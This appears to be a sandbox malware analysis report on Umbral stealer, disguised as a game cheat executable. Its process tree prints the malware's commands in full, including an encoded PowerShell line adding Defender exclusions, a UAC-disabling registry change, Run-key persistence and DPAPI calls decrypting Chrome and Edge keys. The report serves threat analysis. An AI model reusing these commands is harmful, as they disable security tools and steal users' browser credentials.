umbral | f139ed18bca38e4e61fa88f94f0a070d217df1c1f647191510253352724ea1b5

Analysis

max time kernel
113s
max time network
115s
platform
windows11-21h2_x64
resource
win11-20241007-fr
resource tags

arch:x64arch:x86image:win11-20241007-frlocale:fr-fros:windows11-21h2-x64systemwindows
submitted
14-01-2025 21:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

OblivionCheatVIP 2.1/OblivionClient.exe
Size

41.8MB
MD5

95a3e8c1d4a5c7bd87a123b5cccb9f67
SHA1

152bca2603e39111cc446692d8a29501d980def9
SHA256

aa3765a7cfa4a5430c350c0d44252216c215c3fb3ffdf793cbef71dea633bdd8
SHA512

8c9663f0f7700dd71475e9bad481e38a1131c636181ca768c4b9016c5e6e233131a37ab5e100b6c071459ef4ee6a7ace6eb22bd671cf5b0c8ded61e6ac8387d1
SSDEEP

786432:/ogRer1/vUMrlxwEnk9T5diXo80MVzyj41wt/B3FVB4idWQb9QqMbJVaGeSWj:/ogRA1/3l1nkZ5diXo80MVu82TrXQqk4

Score

10^/10

umbral defense_evasion discovery evasion execution persistence spyware stealer trojan

Malware Config

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral32/files/0x001a00000002ae3b-44.dat	family_umbral
behavioral32/memory/5688-51-0x00000179CCBC0000-0x00000179CCC00000-memory.dmp	family_umbral

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4848	powershell.exe
3196	powershell.exe
3164	powershell.exe
1952	powershell.exe
4616	powershell.exe
5444	powershell.exe
940	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	svchost.exe

Executes dropped EXE 5 IoCs

pid	Process
5132	TestingServer.exe
5052	Node.exe
5688	svchost.exe
5664	python-installer.exe
2956	python-installer.exe

Loads dropped DLL 2 IoCs

pid	Process
5052	Node.exe
2956	python-installer.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\Node = "C:\\ProgramData\\Update.vbs"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4} = "\"C:\\Users\\Admin\\AppData\\Local\\Package Cache\\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\\python-3.12.6-amd64.exe\" /burn.runonce"	python-installer.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
10	5204	msiexec.exe
11	5204	msiexec.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
3	discord.com
6	discord.com
7	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

pid	Process
1408	cmd.exe
5060	cmd.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\rjtbUgHx9H.txt	Node.exe
File opened for modification	C:\Windows\System32\rjtbUgHx9H.txt	Node.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
3512	tasklist.exe
2264	tasklist.exe

Drops file in Windows directory 24 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\SystemTemp\~DFDD5B1A1442563E79.TMP	msiexec.exe
File created	C:\Windows\Installer\e592d26.msi	msiexec.exe
File created	C:\Windows\SystemTemp\~DFBF2E6612F634658E.TMP	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\SystemTemp\~DF43806EAC30BD94D3.TMP	msiexec.exe
File created	C:\Windows\SystemTemp\~DF784328A2D7A91321.TMP	msiexec.exe
File created	C:\Windows\SystemTemp\~DFA88CA1F7B98004E4.TMP	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\Installer\SourceHash{901B913C-FA63-48D2-9842-7D7676739378}	msiexec.exe
File created	C:\Windows\Installer\SourceHash{537B2AF5-504B-4303-99CB-FDE56F47AA51}	msiexec.exe
File created	C:\Windows\SystemTemp\~DFA735CBA243FC8413.TMP	msiexec.exe
File created	C:\Windows\SystemTemp\~DFA3EE31D4ADD4481A.TMP	msiexec.exe
File created	C:\Windows\Installer\e592d25.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e592d26.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3158.tmp	msiexec.exe
File created	C:\Windows\Installer\e592d21.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e592d21.msi	msiexec.exe
File created	C:\Windows\SystemTemp\~DF44F52838B539F720.TMP	msiexec.exe
File created	C:\Windows\SystemTemp\~DF78781C8EC5ADFEA8.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2FF0.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DFD3AFC8406878D5FA.TMP	msiexec.exe
File created	C:\Windows\SystemTemp\~DF36CF2916973D45CE.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI337C.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OblivionClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python-installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python-installer.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3360	cmd.exe
5044	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5392	wmic.exe

Modifies registry class 25 IoCs

description	ioc	Process
Key deleted	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Dependents	python-installer.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Installer\Dependencies\CPython-3.12\Dependents	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Installer\Dependencies\CPython-3.12\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\DisplayName = "Python 3.12.6 Executables (64-bit)"	python-installer.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}	python-installer.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Installer\Dependencies\CPython-3.12	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Installer\Dependencies\CPython-3.12	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Installer\Dependencies\CPython-3.12\ = "{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\Version = "3.12.6150.0"	python-installer.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}	python-installer.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}	python-installer.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Installer\Dependencies\CPython-3.12\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\ = "{901B913C-FA63-48D2-9842-7D7676739378}"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Version = "3.12.6150.0"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\ = "{537B2AF5-504B-4303-99CB-FDE56F47AA51}"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Installer\Dependencies\CPython-3.12\DisplayName = "Python 3.12.6 (64-bit)"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Installer\Dependencies\CPython-3.12\Dependents	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\DisplayName = "Python 3.12.6 Core Interpreter (64-bit)"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Installer	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Installer\Dependencies	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Installer\Dependencies\CPython-3.12\Version = "3.12.6150.0"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Dependents	python-installer.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5044	PING.EXE

Suspicious behavior: EnumeratesProcesses 31 IoCs

pid	Process
1596	powershell.exe
1596	powershell.exe
1952	powershell.exe
1952	powershell.exe
5688	svchost.exe
5444	powershell.exe
5444	powershell.exe
3196	powershell.exe
3196	powershell.exe
3164	powershell.exe
3164	powershell.exe
3332	powershell.exe
3332	powershell.exe
4296	powershell.exe
4296	powershell.exe
5320	powershell.exe
5320	powershell.exe
4848	powershell.exe
4848	powershell.exe
940	powershell.exe
940	powershell.exe
4616	powershell.exe
4616	powershell.exe
5204	msiexec.exe
5204	msiexec.exe
5204	msiexec.exe
5204	msiexec.exe
5204	msiexec.exe
5204	msiexec.exe
5204	msiexec.exe
5204	msiexec.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1596	powershell.exe
Token: SeDebugPrivilege	5688	svchost.exe
Token: SeIncreaseQuotaPrivilege	5976	wmic.exe
Token: SeSecurityPrivilege	5976	wmic.exe
Token: SeTakeOwnershipPrivilege	5976	wmic.exe
Token: SeLoadDriverPrivilege	5976	wmic.exe
Token: SeSystemProfilePrivilege	5976	wmic.exe
Token: SeSystemtimePrivilege	5976	wmic.exe
Token: SeProfSingleProcessPrivilege	5976	wmic.exe
Token: SeIncBasePriorityPrivilege	5976	wmic.exe
Token: SeCreatePagefilePrivilege	5976	wmic.exe
Token: SeBackupPrivilege	5976	wmic.exe
Token: SeRestorePrivilege	5976	wmic.exe
Token: SeShutdownPrivilege	5976	wmic.exe
Token: SeDebugPrivilege	5976	wmic.exe
Token: SeSystemEnvironmentPrivilege	5976	wmic.exe
Token: SeRemoteShutdownPrivilege	5976	wmic.exe
Token: SeUndockPrivilege	5976	wmic.exe
Token: SeManageVolumePrivilege	5976	wmic.exe
Token: 33	5976	wmic.exe
Token: 34	5976	wmic.exe
Token: 35	5976	wmic.exe
Token: 36	5976	wmic.exe
Token: SeIncreaseQuotaPrivilege	5976	wmic.exe
Token: SeSecurityPrivilege	5976	wmic.exe
Token: SeTakeOwnershipPrivilege	5976	wmic.exe
Token: SeLoadDriverPrivilege	5976	wmic.exe
Token: SeSystemProfilePrivilege	5976	wmic.exe
Token: SeSystemtimePrivilege	5976	wmic.exe
Token: SeProfSingleProcessPrivilege	5976	wmic.exe
Token: SeIncBasePriorityPrivilege	5976	wmic.exe
Token: SeCreatePagefilePrivilege	5976	wmic.exe
Token: SeBackupPrivilege	5976	wmic.exe
Token: SeRestorePrivilege	5976	wmic.exe
Token: SeShutdownPrivilege	5976	wmic.exe
Token: SeDebugPrivilege	5976	wmic.exe
Token: SeSystemEnvironmentPrivilege	5976	wmic.exe
Token: SeRemoteShutdownPrivilege	5976	wmic.exe
Token: SeUndockPrivilege	5976	wmic.exe
Token: SeManageVolumePrivilege	5976	wmic.exe
Token: 33	5976	wmic.exe
Token: 34	5976	wmic.exe
Token: 35	5976	wmic.exe
Token: 36	5976	wmic.exe
Token: SeDebugPrivilege	1952	powershell.exe
Token: SeIncreaseQuotaPrivilege	2408	WMIC.exe
Token: SeSecurityPrivilege	2408	WMIC.exe
Token: SeTakeOwnershipPrivilege	2408	WMIC.exe
Token: SeLoadDriverPrivilege	2408	WMIC.exe
Token: SeSystemProfilePrivilege	2408	WMIC.exe
Token: SeSystemtimePrivilege	2408	WMIC.exe
Token: SeProfSingleProcessPrivilege	2408	WMIC.exe
Token: SeIncBasePriorityPrivilege	2408	WMIC.exe
Token: SeCreatePagefilePrivilege	2408	WMIC.exe
Token: SeBackupPrivilege	2408	WMIC.exe
Token: SeRestorePrivilege	2408	WMIC.exe
Token: SeShutdownPrivilege	2408	WMIC.exe
Token: SeDebugPrivilege	2408	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2408	WMIC.exe
Token: SeRemoteShutdownPrivilege	2408	WMIC.exe
Token: SeUndockPrivilege	2408	WMIC.exe
Token: SeManageVolumePrivilege	2408	WMIC.exe
Token: 33	2408	WMIC.exe
Token: 34	2408	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3780 wrote to memory of 1596	3780	OblivionClient.exe	78
PID 3780 wrote to memory of 1596	3780	OblivionClient.exe	78
PID 3780 wrote to memory of 1596	3780	OblivionClient.exe	78
PID 3780 wrote to memory of 5132	3780	OblivionClient.exe	80
PID 3780 wrote to memory of 5132	3780	OblivionClient.exe	80
PID 3780 wrote to memory of 5052	3780	OblivionClient.exe	81
PID 3780 wrote to memory of 5052	3780	OblivionClient.exe	81
PID 3780 wrote to memory of 5688	3780	OblivionClient.exe	83
PID 3780 wrote to memory of 5688	3780	OblivionClient.exe	83
PID 5688 wrote to memory of 5976	5688	svchost.exe	84
PID 5688 wrote to memory of 5976	5688	svchost.exe	84
PID 5052 wrote to memory of 2624	5052	Node.exe	86
PID 5052 wrote to memory of 2624	5052	Node.exe	86
PID 2624 wrote to memory of 1952	2624	cmd.exe	88
PID 2624 wrote to memory of 1952	2624	cmd.exe	88
PID 1952 wrote to memory of 4024	1952	powershell.exe	89
PID 1952 wrote to memory of 4024	1952	powershell.exe	89
PID 4024 wrote to memory of 2448	4024	csc.exe	90
PID 4024 wrote to memory of 2448	4024	csc.exe	90
PID 5688 wrote to memory of 2952	5688	svchost.exe	91
PID 5688 wrote to memory of 2952	5688	svchost.exe	91
PID 5052 wrote to memory of 1404	5052	Node.exe	93
PID 5052 wrote to memory of 1404	5052	Node.exe	93
PID 5688 wrote to memory of 5444	5688	svchost.exe	94
PID 5688 wrote to memory of 5444	5688	svchost.exe	94
PID 1404 wrote to memory of 2408	1404	cmd.exe	95
PID 1404 wrote to memory of 2408	1404	cmd.exe	95
PID 5052 wrote to memory of 1556	5052	Node.exe	97
PID 5052 wrote to memory of 1556	5052	Node.exe	97
PID 1556 wrote to memory of 2264	1556	cmd.exe	98
PID 1556 wrote to memory of 2264	1556	cmd.exe	98
PID 5688 wrote to memory of 3196	5688	svchost.exe	99
PID 5688 wrote to memory of 3196	5688	svchost.exe	99
PID 5688 wrote to memory of 3164	5688	svchost.exe	101
PID 5688 wrote to memory of 3164	5688	svchost.exe	101
PID 5688 wrote to memory of 3332	5688	svchost.exe	103
PID 5688 wrote to memory of 3332	5688	svchost.exe	103
PID 5052 wrote to memory of 5496	5052	Node.exe	105
PID 5052 wrote to memory of 5496	5052	Node.exe	105
PID 5052 wrote to memory of 1408	5052	Node.exe	106
PID 5052 wrote to memory of 1408	5052	Node.exe	106
PID 5496 wrote to memory of 3512	5496	cmd.exe	107
PID 5496 wrote to memory of 3512	5496	cmd.exe	107
PID 1408 wrote to memory of 4296	1408	cmd.exe	108
PID 1408 wrote to memory of 4296	1408	cmd.exe	108
PID 5052 wrote to memory of 5060	5052	Node.exe	109
PID 5052 wrote to memory of 5060	5052	Node.exe	109
PID 5060 wrote to memory of 5320	5060	cmd.exe	110
PID 5060 wrote to memory of 5320	5060	cmd.exe	110
PID 5688 wrote to memory of 2892	5688	svchost.exe	111
PID 5688 wrote to memory of 2892	5688	svchost.exe	111
PID 5688 wrote to memory of 4780	5688	svchost.exe	113
PID 5688 wrote to memory of 4780	5688	svchost.exe	113
PID 5688 wrote to memory of 1212	5688	svchost.exe	115
PID 5688 wrote to memory of 1212	5688	svchost.exe	115
PID 5052 wrote to memory of 1068	5052	Node.exe	117
PID 5052 wrote to memory of 1068	5052	Node.exe	117
PID 5688 wrote to memory of 4848	5688	svchost.exe	118
PID 5688 wrote to memory of 4848	5688	svchost.exe	118
PID 1068 wrote to memory of 5212	1068	cmd.exe	120
PID 1068 wrote to memory of 5212	1068	cmd.exe	120
PID 5052 wrote to memory of 5480	5052	Node.exe	121
PID 5052 wrote to memory of 5480	5052	Node.exe	121
PID 5052 wrote to memory of 6012	5052	Node.exe	122

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2952	attrib.exe

C:\Users\Admin\AppData\Local\Temp\OblivionCheatVIP 2.1\OblivionClient.exe
"C:\Users\Admin\AppData\Local\Temp\OblivionCheatVIP 2.1\OblivionClient.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3780
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAYQBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAZgBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAYgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYgBhACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1596
- C:\Users\Admin\AppData\Local\Temp\TestingServer.exe
  "C:\Users\Admin\AppData\Local\Temp\TestingServer.exe"
  2⤵
  - Executes dropped EXE
  PID:5132
- C:\Users\Admin\AppData\Local\Temp\Node.exe
  "C:\Users\Admin\AppData\Local\Temp\Node.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:5052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\JUPsc5snLH.ps1""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2624
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\JUPsc5snLH.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1952
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n2u1p2vk\n2u1p2vk.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4024
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8944.tmp" "c:\Users\Admin\AppData\Local\Temp\n2u1p2vk\CSC2CD7898B3A144A5C83FD42FDF67915C1.TMP"
        6⤵
        
        PID:2448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1404
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic diskdrive get serialnumber
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1556
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:2264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5496
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:3512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,211,190,155,212,161,26,210,77,159,26,162,51,191,113,127,134,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,52,191,44,175,202,94,240,40,253,234,14,202,88,192,68,39,48,176,16,167,124,114,159,22,111,116,210,7,186,148,52,13,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,73,146,127,243,12,90,204,210,164,145,248,196,248,230,199,184,162,169,63,95,9,231,243,206,36,39,255,157,49,85,110,227,48,0,0,0,120,172,104,94,94,228,65,149,141,127,105,236,251,73,156,174,236,146,28,190,110,61,118,8,217,229,133,239,116,21,124,254,100,185,207,93,1,229,97,104,150,75,162,87,186,20,254,73,64,0,0,0,228,247,225,107,223,129,171,102,92,218,225,29,94,56,56,96,13,65,171,20,155,151,128,103,43,15,44,131,26,10,129,24,124,98,235,141,224,208,154,17,163,62,220,67,116,8,66,207,71,170,58,84,223,223,230,221,251,192,134,15,30,194,137,226), $null, 'CurrentUser')"
    3⤵
    - An obfuscated cmd.exe command-line is typically used to evade detection.
    - Suspicious use of WriteProcessMemory
    PID:1408
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,211,190,155,212,161,26,210,77,159,26,162,51,191,113,127,134,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,52,191,44,175,202,94,240,40,253,234,14,202,88,192,68,39,48,176,16,167,124,114,159,22,111,116,210,7,186,148,52,13,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,73,146,127,243,12,90,204,210,164,145,248,196,248,230,199,184,162,169,63,95,9,231,243,206,36,39,255,157,49,85,110,227,48,0,0,0,120,172,104,94,94,228,65,149,141,127,105,236,251,73,156,174,236,146,28,190,110,61,118,8,217,229,133,239,116,21,124,254,100,185,207,93,1,229,97,104,150,75,162,87,186,20,254,73,64,0,0,0,228,247,225,107,223,129,171,102,92,218,225,29,94,56,56,96,13,65,171,20,155,151,128,103,43,15,44,131,26,10,129,24,124,98,235,141,224,208,154,17,163,62,220,67,116,8,66,207,71,170,58,84,223,223,230,221,251,192,134,15,30,194,137,226), $null, 'CurrentUser')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,211,190,155,212,161,26,210,77,159,26,162,51,191,113,127,134,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,98,66,225,2,241,192,106,50,133,54,192,187,162,3,97,114,165,104,134,232,23,55,137,43,223,107,186,219,176,217,134,63,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,40,235,29,118,130,81,211,113,150,180,68,200,251,184,94,59,137,186,63,36,4,133,110,51,155,209,85,151,138,126,224,48,0,0,0,137,49,167,94,183,200,188,50,162,222,107,135,228,103,19,222,52,93,3,178,220,48,15,0,8,80,26,48,204,226,138,12,238,115,178,157,214,67,97,8,42,134,193,40,123,79,97,153,64,0,0,0,213,138,219,51,189,201,113,36,149,155,132,70,211,181,209,8,150,225,17,101,69,112,240,141,105,105,111,255,172,95,142,145,32,35,181,34,75,186,247,230,35,58,240,120,126,71,252,124,166,199,222,222,246,253,131,69,221,14,53,79,35,148,193,91), $null, 'CurrentUser')"
    3⤵
    - An obfuscated cmd.exe command-line is typically used to evade detection.
    - Suspicious use of WriteProcessMemory
    PID:5060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
